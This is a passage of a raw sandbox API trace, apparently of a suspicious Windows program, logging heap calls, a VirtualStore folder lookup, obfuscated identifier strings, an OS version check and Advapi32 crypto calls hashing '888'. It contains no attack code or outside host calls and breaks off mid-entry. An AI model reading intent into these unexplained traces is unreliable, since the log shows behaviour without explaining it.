0x2a72a58 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0205.144] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0205.144] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0205.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.145] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0205.145] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0205.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0205.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0205.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0205.146] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0205.146] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.146] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0205.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0205.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.147] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0205.147] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.147] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/VirtualStore", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a795684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd3024d82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6a795684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0x9e1bf8 [0205.147] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.148] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.148] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.148] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.149] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.149] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0205.149] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.149] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.149] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.151] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.152] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.152] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.153] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.153] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0205.153] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0205.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0205.153] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.153] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.153] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0205.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0205.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0205.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7080, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0205.154] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c550) returned 1 [0205.154] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0205.154] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0205.155] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.155] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.155] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0205.155] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0205.155] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.155] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.156] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.156] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.156] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0205.156] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0205.156] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.156] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.156] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0205.156] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0205.156] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaab70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0205.156] CryptCreateHash (in: hProv=0xa7c550, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0205.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.156] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0205.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0205.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71a68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0205.157] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0205.157] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0205.157] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.157] WideCharToMultiByte (in: 